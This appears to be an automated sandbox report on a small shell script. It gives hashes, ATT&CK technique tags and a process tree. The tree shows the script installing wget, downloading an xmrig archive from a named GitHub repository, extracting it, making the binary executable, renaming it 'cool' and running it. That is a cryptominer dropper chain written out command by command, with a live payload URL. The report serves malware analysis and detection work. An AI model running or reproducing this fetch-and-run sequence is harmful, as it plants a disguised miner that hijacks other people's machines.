a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

General

Target

runnb.sh
Size

213B
MD5

a1189543e2f98f6696c6d857b899ab0a
SHA1

30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512

472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score

7^/10

credential_access defense_evasion discovery privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
1649	chmod

OS Credential Dumping 1 TTPs 1 IoCs

Adversaries may attempt to dump credentials to use it in password cracking.

credential_access

/etc/passwd and /etc/shadow

T1003.008

Processes:

sudo

description	ioc	Process
File opened for reading	/etc/shadow	sudo

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

Processes:

sudo

pid	Process
1578	sudo

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

snapsnapsnapsnapsnapsnapsnapsnap

description	ioc	Process
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

aptsnapdpkgsnapsudodpkgsnapmvsnapaptdpkgsnapsnapsnapdpkgsnaptar

description	ioc	Process
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/1/limits	sudo
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:1577
- /usr/bin/sudo
  sudo apt install wget
  2⤵
  - OS Credential Dumping
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1578
- - /usr/bin/apt
    apt install wget
    3⤵
    - Reads runtime system information
    PID:1579
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:1580
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:1584
  - - /bin/sh
      /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      4⤵
      PID:1585
    - - /usr/bin/snap
        
        /usr/bin/snap advise-snap --from-apt
        5⤵
        Enumerates kernel/hardware configuration
        Reads runtime system information
        
        PID:1586
  - - /bin/sh
      /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      4⤵
      PID:1591
    - - /usr/bin/snap
        
        /usr/bin/snap advise-snap --from-apt
        5⤵
        Enumerates kernel/hardware configuration
        Reads runtime system information
        
        PID:1592
  - - /bin/sh
      /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      4⤵
      PID:1597
    - - /usr/bin/snap
        
        /usr/bin/snap advise-snap --from-apt
        5⤵
        Enumerates kernel/hardware configuration
        Reads runtime system information
        
        PID:1598
  - - /bin/sh
      /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      4⤵
      PID:1604
    - - /usr/bin/snap
        
        /usr/bin/snap advise-snap --from-apt
        5⤵
        Enumerates kernel/hardware configuration
        Reads runtime system information
        
        PID:1605
- /usr/bin/apt
  apt install wget
  2⤵
  - Reads runtime system information
  PID:1610
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1611
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1612
- - /bin/sh
    /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
    3⤵
    PID:1613
  - - /usr/bin/snap
      /usr/bin/snap advise-snap --from-apt
      4⤵
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:1614
- - /bin/sh
    /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
    3⤵
    PID:1622
  - - /usr/bin/snap
      /usr/bin/snap advise-snap --from-apt
      4⤵
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:1623
- - /bin/sh
    /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
    3⤵
    PID:1631
  - - /usr/bin/snap
      /usr/bin/snap advise-snap --from-apt
      4⤵
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:1632
- - /bin/sh
    /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
    3⤵
    PID:1640
  - - /usr/bin/snap
      /usr/bin/snap advise-snap --from-apt
      4⤵
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:1641
- /usr/bin/wget
  wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  2⤵
  PID:1647
- /usr/bin/tar
  tar xvf xmrigtar.tar.gz
  2⤵
  - Reads runtime system information
  PID:1648
- /usr/bin/chmod
  chmod +x xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:1649
- /usr/bin/mv
  mv xmrig cool
  2⤵
  - Reads runtime system information
  PID:1650
- /tmp/cool
  ./cool
  2⤵
  PID:1651